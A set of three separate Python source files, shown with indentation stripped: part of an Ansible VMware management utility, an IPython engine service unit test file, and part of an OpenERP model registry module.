net_dict[device.macAddress] = list(device.ipAddress)
if vm.guest.ipAddress:
if ':' in vm.guest.ipAddress:
facts['ipv6'] = vm.guest.ipAddress
else:
facts['ipv4'] = vm.guest.ipAddress
ethernet_idx = 0
for entry in vm.config.hardware.device:
if not hasattr(entry, 'macAddress'):
continue
if entry.macAddress:
mac_addr = entry.macAddress
mac_addr_dash = mac_addr.replace(':', '-')
else:
mac_addr = mac_addr_dash = None
if (hasattr(entry, 'backing') and hasattr(entry.backing, 'port') and
hasattr(entry.backing.port, 'portKey') and hasattr(entry.backing.port, 'portgroupKey')):
port_group_key = entry.backing.port.portgroupKey
port_key = entry.backing.port.portKey
else:
port_group_key = None
port_key = None
factname = 'hw_eth' + str(ethernet_idx)
facts[factname] = {
'addresstype': entry.addressType,
'label': entry.deviceInfo.label,
'macaddress': mac_addr,
'ipaddresses': net_dict.get(entry.macAddress, None),
'macaddress_dash': mac_addr_dash,
'summary': entry.deviceInfo.summary,
'portgroup_portkey': port_key,
'portgroup_key': port_group_key,
}
facts['hw_interfaces'].append('eth' + str(ethernet_idx))
ethernet_idx += 1
snapshot_facts = list_snapshots(vm)
if 'snapshots' in snapshot_facts:
facts['snapshots'] = snapshot_facts['snapshots']
facts['current_snapshot'] = snapshot_facts['current_snapshot']
facts['vnc'] = get_vnc_extraconfig(vm)
return facts
def deserialize_snapshot_obj(obj):
return {'id': obj.id,
'name': obj.name,
'description': obj.description,
'creation_time': obj.createTime,
'state': obj.state}
def list_snapshots_recursively(snapshots):
snapshot_data = []
for snapshot in snapshots:
snapshot_data.append(deserialize_snapshot_obj(snapshot))
snapshot_data = snapshot_data + list_snapshots_recursively(snapshot.childSnapshotList)
return snapshot_data
def get_current_snap_obj(snapshots, snapob):
snap_obj = []
for snapshot in snapshots:
if snapshot.snapshot == snapob:
snap_obj.append(snapshot)
snap_obj = snap_obj + get_current_snap_obj(snapshot.childSnapshotList, snapob)
return snap_obj
def list_snapshots(vm):
result = {}
snapshot = _get_vm_prop(vm, ('snapshot',))
if not snapshot:
return result
if vm.snapshot is None:
return result
result['snapshots'] = list_snapshots_recursively(vm.snapshot.rootSnapshotList)
current_snapref = vm.snapshot.currentSnapshot
current_snap_obj = get_current_snap_obj(vm.snapshot.rootSnapshotList, current_snapref)
if current_snap_obj:
result['current_snapshot'] = deserialize_snapshot_obj(current_snap_obj[0])
else:
result['current_snapshot'] = dict()
return result
def get_vnc_extraconfig(vm):
result = {}
for opts in vm.config.extraConfig:
for optkeyname in ['enabled', 'ip', 'port', 'password']:
if opts.key.lower() == "remotedisplay.vnc." + optkeyname:
result[optkeyname] = opts.value
return result
def vmware_argument_spec():
return dict(
hostname=dict(type='str',
required=False,
fallback=(env_fallback, ['VMWARE_HOST']),
),
username=dict(type='str',
aliases=['user', 'admin'],
required=False,
fallback=(env_fallback, ['VMWARE_USER'])),
password=dict(type='str',
aliases=['pass', 'pwd'],
required=False,
no_log=True,
fallback=(env_fallback, ['VMWARE_PASSWORD'])),
port=dict(type='int',
default=443,
fallback=(env_fallback, ['VMWARE_PORT'])),
validate_certs=dict(type='bool',
required=False,
default=True,
fallback=(env_fallback, ['VMWARE_VALIDATE_CERTS'])),
)
def connect_to_api(module, disconnect_atexit=True):
hostname = module.params['hostname']
username = module.params['username']
password = module.params['password']
port = module.params.get('port', 443)
validate_certs = module.params['validate_certs']
if not hostname:
module.fail_json(msg="Hostname parameter is missing."
" Please specify this parameter in task or"
" export environment variable like 'export VMWARE_HOST=ESXI_HOSTNAME'")
if not username:
module.fail_json(msg="Username parameter is missing."
" Please specify this parameter in task or"
" export environment variable like 'export VMWARE_USER=ESXI_USERNAME'")
if not password:
module.fail_json(msg="Password parameter is missing."
" Please specify this parameter in task or"
" export environment variable like 'export VMWARE_PASSWORD=ESXI_PASSWORD'")
if validate_certs and not hasattr(ssl, 'SSLContext'):
module.fail_json(msg='pyVim does not support changing verification mode with python < 2.7.9. Either update '
'python or use validate_certs=false.')
ssl_context = None
if not validate_certs and hasattr(ssl, 'SSLContext'):
ssl_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_context.verify_mode = ssl.CERT_NONE
service_instance = None
try:
connect_args = dict(
host=hostname,
user=username,
pwd=password,
port=port,
)
if ssl_context:
connect_args.update(sslContext=ssl_context)
service_instance = connect.SmartConnect(**connect_args)
except vim.fault.InvalidLogin as invalid_login:
module.fail_json(msg="Unable to log on to vCenter or ESXi API at %s:%s as %s: %s" % (hostname, port, username, invalid_login.msg))
except vim.fault.NoPermission as no_permission:
module.fail_json(msg="User %s does not have required permission"
" to log on to vCenter or ESXi API at %s:%s : %s" % (username, hostname, port, no_permission.msg))
except (requests.ConnectionError, ssl.SSLError) as generic_req_exc:
module.fail_json(msg="Unable to connect to vCenter or ESXi API at %s on TCP/%s: %s" % (hostname, port, generic_req_exc))
except vmodl.fault.InvalidRequest as invalid_request:
# Request is malformed
module.fail_json(msg="Failed to get a response from server %s:%s as "
"request is malformed: %s" % (hostname, port, invalid_request.msg))
except Exception as generic_exc:
module.fail_json(msg="Unknown error while connecting to vCenter or ESXi API at %s:%s : %s" % (hostname, port, generic_exc))
if service_instance is None:
module.fail_json(msg="Unknown error while connecting to vCenter or ESXi API at %s:%s" % (hostname, port))
# Disabling atexit should be used in special cases only.
# Such as IP change of the ESXi host which removes the connection anyway.
# Also removal significantly speeds up the return of the module
if disconnect_atexit:
atexit.register(connect.Disconnect, service_instance)
return service_instance.RetrieveContent()
def get_all_objs(content, vimtype, folder=None, recurse=True):
if not folder:
folder = content.rootFolder
obj = {}
container = content.viewManager.CreateContainerView(folder, vimtype, recurse)
for managed_object_ref in container.view:
obj.update({managed_object_ref: managed_object_ref.name})
return obj
def run_command_in_guest(content, vm, username, password, program_path, program_args, program_cwd, program_env):
result = {'failed': False}
tools_status = vm.guest.toolsStatus
if (tools_status == 'toolsNotInstalled' or
tools_status == 'toolsNotRunning'):
result['failed'] = True
result['msg'] = "VMwareTools is not installed or is not running in the guest"
return result
# https://github.com/vmware/pyvmomi/blob/master/docs/vim/vm/guest/NamePasswordAuthentication.rst
creds = vim.vm.guest.NamePasswordAuthentication(
username=username, password=password
)
try:
# https://github.com/vmware/pyvmomi/blob/master/docs/vim/vm/guest/ProcessManager.rst
pm = content.guestOperationsManager.processManager
# https://www.vmware.com/support/developer/converter-sdk/conv51_apireference/vim.vm.guest.ProcessManager.ProgramSpec.html
ps = vim.vm.guest.ProcessManager.ProgramSpec(
# programPath=program,
# arguments=args
programPath=program_path,
arguments=program_args,
workingDirectory=program_cwd,
)
res = pm.StartProgramInGuest(vm, creds, ps)
result['pid'] = res
pdata = pm.ListProcessesInGuest(vm, creds, [res])
# wait for pid to finish
while not pdata[0].endTime:
time.sleep(1)
pdata = pm.ListProcessesInGuest(vm, creds, [res])
result['owner'] = pdata[0].owner
result['startTime'] = pdata[0].startTime.isoformat()
result['endTime'] = pdata[0].endTime.isoformat()
result['exitCode'] = pdata[0].exitCode
if result['exitCode'] != 0:
result['failed'] = True
result['msg'] = "program exited non-zero"
else:
result['msg'] = "program completed successfully"
except Exception as e:
result['msg'] = str(e)
result['failed'] = True
return result
def serialize_spec(clonespec):
"""Serialize a clonespec or a relocation spec"""
data = {}
attrs = dir(clonespec)
attrs = [x for x in attrs if not x.startswith('_')]
for x in attrs:
xo = getattr(clonespec, x)
if callable(xo):
continue
xt = type(xo)
if xo is None:
data[x] = None
elif isinstance(xo, vim.vm.ConfigSpec):
data[x] = serialize_spec(xo)
elif isinstance(xo, vim.vm.RelocateSpec):
data[x] = serialize_spec(xo)
elif isinstance(xo, vim.vm.device.VirtualDisk):
data[x] = serialize_spec(xo)
elif isinstance(xo, vim.vm.device.VirtualDeviceSpec.FileOperation):
data[x] = to_text(xo)
elif isinstance(xo, vim.Description):
data[x] = {
'dynamicProperty': serialize_spec(xo.dynamicProperty),
'dynamicType': serialize_spec(xo.dynamicType),
'label': serialize_spec(xo.label),
'summary': serialize_spec(xo.summary),
}
elif hasattr(xo, 'name'):
data[x] = to_text(xo) + ':' + to_text(xo.name)
elif isinstance(xo, vim.vm.ProfileSpec):
pass
elif issubclass(xt, list):
data[x] = []
for xe in xo:
data[x].append(serialize_spec(xe))
elif issubclass(xt, string_types + integer_types + (float, bool)):
if issubclass(xt, integer_types):
data[x] = int(xo)
else:
data[x] = to_text(xo)
elif issubclass(xt, bool):
data[x] = xo
elif issubclass(xt, dict):
data[to_text(x)] = {}
for k, v in xo.items():
k = to_text(k)
data[x][k] = serialize_spec(v)
else:
data[x] = str(xt)
return data
def find_host_by_cluster_datacenter(module, content, datacenter_name, cluster_name, host_name):
dc = find_datacenter_by_name(content, datacenter_name)
if dc is None:
module.fail_json(msg="Unable to find datacenter with name %s" % datacenter_name)
cluster = find_cluster_by_name(content, cluster_name, datacenter=dc)
if cluster is None:
module.fail_json(msg="Unable to find cluster with name %s" % cluster_name)
for host in cluster.host:
if host.name == host_name:
return host, cluster
return None, cluster
def set_vm_power_state(content, vm, state, force, timeout=0):
"""
Set the power status for a VM determined by the current and
requested states. force is forceful
"""
facts = gather_vm_facts(content, vm)
expected_state = state.replace('_', '').replace('-', '').lower()
current_state = facts['hw_power_status'].lower()
result = dict(
changed=False,
failed=False,
)
# Need Force
if not force and current_state not in ['poweredon', 'poweredoff']:
result['failed'] = True
result['msg'] = "Virtual Machine is in %s power state. Force is required!" % current_state
return result
# State is not already true
if current_state != expected_state:
task = None
try:
if expected_state == 'poweredoff':
task = vm.PowerOff()
elif expected_state == 'poweredon':
task = vm.PowerOn()
elif expected_state == 'restarted':
if current_state in ('poweredon', 'poweringon', 'resetting', 'poweredoff'):
task = vm.Reset()
else:
result['failed'] = True
result['msg'] = "Cannot restart virtual machine in the current state %s" % current_state
elif expected_state == 'suspended':
if current_state in ('poweredon', 'poweringon'):
task = vm.Suspend()
else:
result['failed'] = True
result['msg'] = 'Cannot suspend virtual machine in the current state %s' % current_state
elif expected_state in ['shutdownguest', 'rebootguest']:
if current_state == 'poweredon':
if vm.guest.toolsRunningStatus == 'guestToolsRunning':
if expected_state == 'shutdownguest':
task = vm.ShutdownGuest()
if timeout > 0:
result.update(wait_for_poweroff(vm, timeout))
else:
task = vm.RebootGuest()
# Set result['changed'] immediately because
# shutdown and reboot return None.
result['changed'] = True
else:
result['failed'] = True
result['msg'] = "VMware tools should be installed for guest shutdown/reboot"
else:
result['failed'] = True
result['msg'] = "Virtual machine %s must be in poweredon state for guest shutdown/reboot" % vm.name
else:
result['failed'] = True
result['msg'] = "Unsupported expected state provided: %s" % expected_state
except Exception as e:
result['failed'] = True
result['msg'] = to_text(e)
if task:
wait_for_task(task)
if task.info.state == 'error':
result['failed'] = True
result['msg'] = task.info.error.msg
else:
result['changed'] = True
# need to get new metadata if changed
result['instance'] = gather_vm_facts(content, vm)
return result
def wait_for_poweroff(vm, timeout=300):
result = dict()
interval = 15
while timeout > 0:
if vm.runtime.powerState.lower() == 'poweredoff':
break
time.sleep(interval)
timeout -= interval
else:
result['failed'] = True
result['msg'] = 'Timeout while waiting for VM power off.'
return result
class PyVmomi(object):
def __init__(self, module):
"""
Constructor
"""
if not HAS_REQUESTS:
module.fail_json(msg=missing_required_lib('requests'),
exception=REQUESTS_IMP_ERR)
if not HAS_PYVMOMI:
module.fail_json(msg=missing_required_lib('PyVmomi'),
exception=PYVMOMI_IMP_ERR)
self.module = module
self.params = module.params
self.si = None
self.current_vm_obj = None
self.content = connect_to_api(self.module)
def is_vcenter(self):
"""
Check if given hostname is vCenter or ESXi host
Returns: True if given connection is with vCenter server
False if given connection is with ESXi server
"""
api_type = None
try:
api_type = self.content.about.apiType
except (vmodl.RuntimeFault, vim.fault.VimFault) as exc:
self.module.fail_json(msg="Failed to get status of vCenter server : %s" % exc.msg)
if api_type == 'VirtualCenter':
return True
elif api_type == 'HostAgent':
return False
def get_managed_objects_properties(self, vim_type, properties=None):
"""
Function to look up a Managed Object Reference in vCenter / ESXi Environment
:param vim_type: Type of vim object e.g, for datacenter - vim.Datacenter
:param properties: List of properties related to vim object e.g. Name
:return: local content object
"""
# Get Root Folder
root_folder = self.content.rootFolder
if properties is None:
properties = ['name']
# Create Container View with default root folder
mor = self.content.viewManager.CreateContainerView(root_folder, [vim_type], True)
# Create Traversal spec
traversal_spec = vmodl.query.PropertyCollector.TraversalSpec(
name="traversal_spec",
path='view',
skip=False,
type=vim.view.ContainerView
)
# Create Property Spec
property_spec = vmodl.query.PropertyCollector.PropertySpec(
type=vim_type, # Type of object to retrieved
all=False,
pathSet=properties
)
# Create Object Spec
object_spec = vmodl.query.PropertyCollector.ObjectSpec(
obj=mor,
skip=True,
selectSet=[traversal_spec]
)
# Create Filter Spec
filter_spec = vmodl.query.PropertyCollector.FilterSpec(
objectSet=[object_spec],
propSet=[property_spec],
reportMissingObjectsInResults=False
)
return self.content.propertyCollector.RetrieveContents([filter_spec])
# Virtual Machine related functions
def get_vm(self):
"""
Function to find unique virtual machine either by UUID or Name.
Returns: virtual machine object if found, else None.
"""
vm_obj = None
user_desired_path = None
if self.params['uuid']:
vm_obj = find_vm_by_id(self.content, vm_id=self.params['uuid'], vm_id_type="uuid")
elif self.params['name']:
objects = self.get_managed_objects_properties(vim_type=vim.VirtualMachine, properties=['name'])
vms = []
for temp_vm_object in objects:
if len(temp_vm_object.propSet) != 1:
continue
for temp_vm_object_property in temp_vm_object.propSet:
if temp_vm_object_property.val == self.params['name']:
vms.append(temp_vm_object.obj)
break
# get_managed_objects_properties may return multiple virtual machine,
# following code tries to find user desired one depending upon the folder specified.
if len(vms) > 1:
# We have found multiple virtual machines, decide depending upon folder value
if self.params['folder'] is None:
self.module.fail_json(msg="Multiple virtual machines with same name [%s] found, "
"Folder value is a required parameter to find uniqueness "
"of the virtual machine" % self.params['name'],
details="Please see documentation of the vmware_guest module "
"for folder parameter.")
# Get folder path where virtual machine is located
# User provided folder where user thinks virtual machine is present
user_folder = self.params['folder']
# User defined datacenter
user_defined_dc = self.params['datacenter']
# User defined datacenter's object
datacenter_obj = find_datacenter_by_name(self.content, self.params['datacenter'])
# Get Path for Datacenter
dcpath = compile_folder_path_for_object(vobj=datacenter_obj)
# Nested folder does not return trailing /
if not dcpath.endswith('/'):
dcpath += '/'
if user_folder in [None, '', '/']:
# User provided blank value or
# User provided only root value, we fail
self.module.fail_json(msg="vmware_guest found multiple virtual machines with same "
"name [%s], please specify folder path other than blank "
"or '/'" % self.params['name'])
elif user_folder.startswith('/vm/'):
# User provided nested folder under VMware default vm folder i.e. folder = /vm/india/finance
user_desired_path = "%s%s%s" % (dcpath, user_defined_dc, user_folder)
else:
# User defined datacenter is not nested i.e. dcpath = '/' , or
# User defined datacenter is nested i.e. dcpath = '/F0/DC0' or
# User provided folder starts with / and datacenter i.e. folder = /ha-datacenter/ or
# User defined folder starts with datacenter without '/' i.e.
# folder = DC0/vm/india/finance or
# folder = DC0/vm
user_desired_path = user_folder
for vm in vms:
# Check if user has provided same path as virtual machine
actual_vm_folder_path = self.get_vm_path(content=self.content, vm_name=vm)
if not actual_vm_folder_path.startswith("%s%s" % (dcpath, user_defined_dc)):
continue
if user_desired_path in actual_vm_folder_path:
vm_obj = vm
break
elif vms:
# Unique virtual machine found.
vm_obj = vms[0]
if vm_obj:
self.current_vm_obj = vm_obj
return vm_obj
def gather_facts(self, vm):
"""
Function to gather facts of virtual machine.
Args:
vm: Name of virtual machine.
Returns: Facts dictionary of the given virtual machine.
"""
return gather_vm_facts(self.content, vm)
@staticmethod
def get_vm_path(content, vm_name):
"""
Function to find the path of virtual machine.
Args:
content: VMware content object
vm_name: virtual machine managed object
Returns: Folder of virtual machine if exists, else None
"""
folder_name = None
folder = vm_name.parent
if folder:
folder_name = folder.name
fp = folder.parent
# climb back up the tree to find our path, stop before the root folder
while fp is not None and fp.name is not None and fp != content.rootFolder:
folder_name = fp.name + '/' + folder_name
try:
fp = fp.parent
except Exception:
break
folder_name = '/' + folder_name
return folder_name
def get_vm_or_template(self, template_name=None):
"""
Find the virtual machine or virtual machine template using name
used for cloning purpose.
Args:
template_name: Name of virtual machine or virtual machine template
Returns: virtual machine or virtual machine template object
"""
template_obj = None
if not template_name:
return template_obj
if "/" in template_name:
vm_obj_path = os.path.dirname(template_name)
vm_obj_name = os.path.basename(template_name)
template_obj = find_vm_by_id(self.content, vm_obj_name, vm_id_type="inventory_path", folder=vm_obj_path)
if template_obj:
return template_obj
else:
template_obj = find_vm_by_id(self.content, vm_id=template_name, vm_id_type="uuid")
if template_obj:
return template_obj
objects = self.get_managed_objects_properties(vim_type=vim.VirtualMachine, properties=['name'])
templates = []
for temp_vm_object in objects:
if len(temp_vm_object.propSet) != 1:
continue
for temp_vm_object_property in temp_vm_object.propSet:
if temp_vm_object_property.val == template_name:
templates.append(temp_vm_object.obj)
break
if len(templates) > 1:
# We have found multiple virtual machine templates
self.module.fail_json(msg="Multiple virtual machines or templates with same name [%s] found." % template_name)
elif templates:
template_obj = templates[0]
return template_obj
# Cluster related functions
def find_cluster_by_name(self, cluster_name, datacenter_name=None):
"""
Find Cluster by name in given datacenter
Args:
cluster_name: Name of cluster name to find
datacenter_name: (optional) Name of datacenter
Returns: True if found
"""
return find_cluster_by_name(self.content, cluster_name, datacenter=datacenter_name)
def get_all_hosts_by_cluster(self, cluster_name):
"""
Get all hosts from cluster by cluster name
Args:
cluster_name: Name of cluster
Returns: List of hosts
"""
cluster_obj = self.find_cluster_by_name(cluster_name=cluster_name)
if cluster_obj:
return [host for host in cluster_obj.host]
else:
return []
# Hosts related functions
def find_hostsystem_by_name(self, host_name):
"""
Find Host by name
Args:
host_name: Name of ESXi host
Returns: True if found
"""
return find_hostsystem_by_name(self.content, hostname=host_name)
def get_all_host_objs(self, cluster_name=None, esxi_host_name=None):
"""
Function to get all host system managed object
Args:
cluster_name: Name of Cluster
esxi_host_name: Name of ESXi server
Returns: A list of all host system managed objects, else empty list
"""
host_obj_list = []
if not self.is_vcenter():
hosts = get_all_objs(self.content, [vim.HostSystem]).keys()
if hosts:
host_obj_list.append(list(hosts)[0])
else:
if cluster_name:
cluster_obj = self.find_cluster_by_name(cluster_name=cluster_name)
if cluster_obj:
host_obj_list = [host for host in cluster_obj.host]
else:
self.module.fail_json(changed=False, msg="Cluster '%s' not found" % cluster_name)
elif esxi_host_name:
if isinstance(esxi_host_name, str):
esxi_host_name = [esxi_host_name]
for host in esxi_host_name:
esxi_host_obj = self.find_hostsystem_by_name(host_name=host)
if esxi_host_obj:
host_obj_list = [esxi_host_obj]
else:
self.module.fail_json(changed=False, msg="ESXi '%s' not found" % host)
return host_obj_list
# Network related functions
@staticmethod
def find_host_portgroup_by_name(host, portgroup_name):
"""
Find Portgroup on given host
Args:
host: Host config object
portgroup_name: Name of portgroup
Returns: True if found else False
"""
for portgroup in host.config.network.portgroup:
if portgroup.spec.name == portgroup_name:
return portgroup
return False
def get_all_port_groups_by_host(self, host_system):
"""
Function to get all Port Group by host
Args:
host_system: Name of Host System
Returns: List of Port Group Spec
"""
pgs_list = []
for pg in host_system.config.network.portgroup:
pgs_list.append(pg)
return pgs_list
# Datacenter
def find_datacenter_by_name(self, datacenter_name):
"""
Function to get datacenter managed object by name
Args:
datacenter_name: Name of datacenter
Returns: datacenter managed object if found else None
"""
return find_datacenter_by_name(self.content, datacenter_name=datacenter_name)
def find_datastore_by_name(self, datastore_name):
"""
Function to get datastore managed object by name
Args:
datastore_name: Name of datastore
Returns: datastore managed object if found else None
"""
return find_datastore_by_name(self.content, datastore_name=datastore_name)
# Datastore cluster
def find_datastore_cluster_by_name(self, datastore_cluster_name):
"""
Function to get datastore cluster managed object by name
Args:
datastore_cluster_name: Name of datastore cluster
Returns: Datastore cluster managed object if found else None
"""
data_store_clusters = get_all_objs(self.content, [vim.StoragePod])
for dsc in data_store_clusters:
if dsc.name == datastore_cluster_name:
return dsc
return None
# VMDK stuff
def vmdk_disk_path_split(self, vmdk_path):
"""
Takes a string in the format
[datastore_name] path/to/vm_name.vmdk
Returns a tuple with multiple strings:
1. datastore_name: The name of the datastore (without brackets)
2. vmdk_fullpath: The "path/to/vm_name.vmdk" portion
3. vmdk_filename: The "vm_name.vmdk" portion of the string (os.path.basename equivalent)
4. vmdk_folder: The "path/to/" portion of the string (os.path.dirname equivalent)
"""
try:
datastore_name = re.match(r'^\[(.*?)\]', vmdk_path, re.DOTALL).groups()[0]
vmdk_fullpath = re.match(r'\[.*?\] (.*)$', vmdk_path).groups()[0]
vmdk_filename = os.path.basename(vmdk_fullpath)
vmdk_folder = os.path.dirname(vmdk_fullpath)
return datastore_name, vmdk_fullpath, vmdk_filename, vmdk_folder
except (IndexError, AttributeError) as e:
self.module.fail_json(msg="Bad path '%s' for filename disk vmdk image: %s" % (vmdk_path, to_native(e)))
def find_vmdk_file(self, datastore_obj, vmdk_fullpath, vmdk_filename, vmdk_folder):
"""
Return vSphere file object or fail_json
Args:
datastore_obj: Managed object of datastore
vmdk_fullpath: Path of VMDK file e.g., path/to/vm/vmdk_filename.vmdk
vmdk_filename: Name of vmdk e.g., VM0001_1.vmdk
vmdk_folder: Base dir of VMDK e.g, path/to/vm
"""
browser = datastore_obj.browser
datastore_name = datastore_obj.name
datastore_name_sq = "[" + datastore_name + "]"
if browser is None:
self.module.fail_json(msg="Unable to access browser for datastore %s" % datastore_name)
detail_query = vim.host.DatastoreBrowser.FileInfo.Details(
fileOwner=True,
fileSize=True,
fileType=True,
modification=True
)
search_spec = vim.host.DatastoreBrowser.SearchSpec(
details=detail_query,
matchPattern=[vmdk_filename],
searchCaseInsensitive=True,
)
search_res = browser.SearchSubFolders(
datastorePath=datastore_name_sq,
searchSpec=search_spec
)
changed = False
vmdk_path = datastore_name_sq + " " + vmdk_fullpath
try:
changed, result = wait_for_task(search_res)
except TaskError as task_e:
self.module.fail_json(msg=to_native(task_e))
if not changed:
self.module.fail_json(msg="No valid disk vmdk image found for path %s" % vmdk_path)
target_folder_path = datastore_name_sq + " " + vmdk_folder + '/'
for file_result in search_res.info.result:
for f in getattr(file_result, 'file'):
if f.path == vmdk_filename and file_result.folderPath == target_folder_path:
return f
self.module.fail_json(msg="No vmdk file found for path specified [%s]" % vmdk_path)
|
"""This file contains unittests for the kernel.engineservice.py module.
Things that should be tested:
- Should the EngineService return Deferred objects?
- Run the same tests that are run in shell.py.
- Make sure that the Interface is really implemented.
- The startService and stopService methods.
"""
__docformat__ = "restructuredtext en"
__test__ = {}
from twisted.internet import defer
from twisted.application.service import IService
from IPython.kernel import engineservice as es
from IPython.testing.util import DeferredTestCase
from IPython.kernel.tests.engineservicetest import \
IEngineCoreTestCase, \
IEngineSerializedTestCase, \
IEngineQueuedTestCase, \
IEnginePropertiesTestCase
class BasicEngineServiceTest(DeferredTestCase,
IEngineCoreTestCase,
IEngineSerializedTestCase,
IEnginePropertiesTestCase):
def setUp(self):
self.engine = es.EngineService()
self.engine.startService()
def tearDown(self):
return self.engine.stopService()
class ThreadedEngineServiceTest(DeferredTestCase,
IEngineCoreTestCase,
IEngineSerializedTestCase,
IEnginePropertiesTestCase):
def setUp(self):
self.engine = es.ThreadedEngineService()
self.engine.startService()
def tearDown(self):
return self.engine.stopService()
class QueuedEngineServiceTest(DeferredTestCase,
IEngineCoreTestCase,
IEngineSerializedTestCase,
IEnginePropertiesTestCase,
IEngineQueuedTestCase):
def setUp(self):
self.rawEngine = es.EngineService()
self.rawEngine.startService()
self.engine = es.IEngineQueued(self.rawEngine)
def tearDown(self):
return self.rawEngine.stopService()
|
from collections import defaultdict
import logging
import re
import time
import types
import openerp
from openerp import SUPERUSER_ID
from openerp import models, tools, api
from openerp.modules.registry import RegistryManager
from openerp.osv import fields, osv
from openerp.osv.orm import BaseModel, Model, MAGIC_COLUMNS, except_orm
from openerp.tools import config
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
MODULE_UNINSTALL_FLAG = '_force_unlink'
def _get_fields_type(self, cr, uid, context=None):
# Avoid too many nested `if`s below, as RedHat's Python 2.6
# break on it. See bug 939653.
return sorted([(k,k) for k,v in fields.__dict__.iteritems()
if type(v) == types.TypeType and \
issubclass(v, fields._column) and \
v != fields._column and \
not v._deprecated and \
not issubclass(v, fields.function)])
def _in_modules(self, cr, uid, ids, field_name, arg, context=None):
#pseudo-method used by fields.function in ir.model/ir.model.fields
module_pool = self.pool["ir.module.module"]
installed_module_ids = module_pool.search(cr, uid, [('state','=','installed')])
installed_module_names = module_pool.read(cr, uid, installed_module_ids, ['name'], context=context)
installed_modules = set(x['name'] for x in installed_module_names)
result = {}
xml_ids = osv.osv._get_xml_ids(self, cr, uid, ids)
for k,v in xml_ids.iteritems():
result[k] = ', '.join(sorted(installed_modules & set(xml_id.split('.')[0] for xml_id in v)))
return result
class unknown(models.AbstractModel):
"""
Abstract model used as a substitute for relational fields with an unknown
comodel.
"""
_name = '_unknown'
class ir_model(osv.osv):
_name = 'ir.model'
_description = "Models"
_order = 'model'
def _is_osv_memory(self, cr, uid, ids, field_name, arg, context=None):
models = self.browse(cr, uid, ids, context=context)
res = dict.fromkeys(ids)
for model in models:
if model.model in self.pool:
res[model.id] = self.pool[model.model].is_transient()
else:
_logger.error('Missing model %s' % (model.model, ))
return res
def _search_osv_memory(self, cr, uid, model, name, domain, context=None):
if not domain:
return []
__, operator, value = domain[0]
if operator not in ['=', '!=']:
raise osv.except_osv(_("Invalid Search Criteria"), _('The osv_memory field can only be compared with = and != operator.'))
value = bool(value) if operator == '=' else not bool(value)
all_model_ids = self.search(cr, uid, [], context=context)
is_osv_mem = self._is_osv_memory(cr, uid, all_model_ids, 'osv_memory', arg=None, context=context)
return [('id', 'in', [id for id in is_osv_mem if bool(is_osv_mem[id]) == value])]
def _view_ids(self, cr, uid, ids, field_name, arg, context=None):
models = self.browse(cr, uid, ids)
res = {}
for model in models:
res[model.id] = self.pool["ir.ui.view"].search(cr, uid, [('model', '=', model.model)])
return res
def _inherited_models(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for model in self.browse(cr, uid, ids, context=context):
res[model.id] = []
inherited_models = [model_name for model_name in self.pool[model.model]._inherits]
if inherited_models:
res[model.id] = self.search(cr, uid, [('model', 'in', inherited_models)], context=context)
return res
_columns = {
'name': fields.char('Model Description', translate=True, required=True),
'model': fields.char('Model', required=True, select=1),
'info': fields.text('Information'),
'field_id': fields.one2many('ir.model.fields', 'model_id', 'Fields', required=True, copy=True),
'inherited_model_ids': fields.function(_inherited_models, type="many2many", obj="ir.model", string="Inherited models",
help="The list of models that extends the current model."),
'state': fields.selection([('manual','Custom Object'),('base','Base Object')],'Type', readonly=True),
'access_ids': fields.one2many('ir.model.access', 'model_id', 'Access'),
'osv_memory': fields.function(_is_osv_memory, string='Transient Model', type='boolean',
fnct_search=_search_osv_memory,
help="This field specifies whether the model is transient or not (i.e. if records are automatically deleted from the database or not)"),
'modules': fields.function(_in_modules, type='char', string='In Modules', help='List of modules in which the object is defined or inherited'),
'view_ids': fields.function(_view_ids, type='one2many', obj='ir.ui.view', string='Views'),
}
_defaults = {
'model': 'x_',
'state': 'manual',
}
def _check_model_name(self, cr, uid, ids, context=None):
for model in self.browse(cr, uid, ids, context=context):
if model.state=='manual':
if not model.model.startswith('x_'):
return False
if not re.match('^[a-z_A-Z0-9.]+$',model.model):
return False
return True
def _model_name_msg(self, cr, uid, ids, context=None):
return _('The Object name must start with x_ and not contain any special character !')
_constraints = [
(_check_model_name, _model_name_msg, ['model']),
]
_sql_constraints = [
('obj_name_uniq', 'unique (model)', 'Each model must be unique!'),
]
# overridden to allow searching both on model name (model field)
# and model description (name field)
def _name_search(self, cr, uid, name='', args=None, operator='ilike', context=None, limit=100, name_get_uid=None):
if args is None:
args = []
domain = args + ['|', ('model', operator, name), ('name', operator, name)]
return self.name_get(cr, name_get_uid or uid,
super(ir_model, self).search(cr, uid, domain, limit=limit, context=context),
context=context)
def _drop_table(self, cr, uid, ids, context=None):
for model in self.browse(cr, uid, ids, context):
model_pool = self.pool[model.model]
cr.execute('select relkind from pg_class where relname=%s', (model_pool._table,))
result = cr.fetchone()
if result and result[0] == 'v':
cr.execute('DROP view %s' % (model_pool._table,))
elif result and result[0] == 'r':
cr.execute('DROP TABLE %s CASCADE' % (model_pool._table,))
return True
def unlink(self, cr, user, ids, context=None):
# Prevent manual deletion of module tables
if context is None: context = {}
if isinstance(ids, (int, long)):
ids = [ids]
if not context.get(MODULE_UNINSTALL_FLAG):
for model in self.browse(cr, user, ids, context):
if model.state != 'manual':
raise except_orm(_('Error'), _("Model '%s' contains module data and cannot be removed!") % (model.name,))
self._drop_table(cr, user, ids, context)
res = super(ir_model, self).unlink(cr, user, ids, context)
if not context.get(MODULE_UNINSTALL_FLAG):
# only reload pool for normal unlink. For module uninstall the
# reload is done independently in openerp.modules.loading
cr.commit() # must be committed before reloading registry in new cursor
api.Environment.reset()
RegistryManager.new(cr.dbname)
RegistryManager.signal_registry_change(cr.dbname)
return res
def write(self, cr, user, ids, vals, context=None):
if context:
context = dict(context)
context.pop('__last_update', None)
# Filter out operations 4 link from field id, because openerp-web
# always write (4,id,False) even for non dirty items
if 'field_id' in vals:
vals['field_id'] = [op for op in vals['field_id'] if op[0] != 4]
return super(ir_model,self).write(cr, user, ids, vals, context)
def create(self, cr, user, vals, context=None):
if context is None:
context = {}
res = super(ir_model,self).create(cr, user, vals, context)
if vals.get('state','manual')=='manual':
# add model in registry
self.instanciate(cr, user, vals['model'], context)
self.pool.setup_models(cr, partial=(not self.pool.ready))
# update database schema
model = self.pool[vals['model']]
ctx = dict(context,
field_name=vals['name'],
field_state='manual',
select=vals.get('select_level', '0'),
update_custom_fields=True)
model._auto_init(cr, ctx)
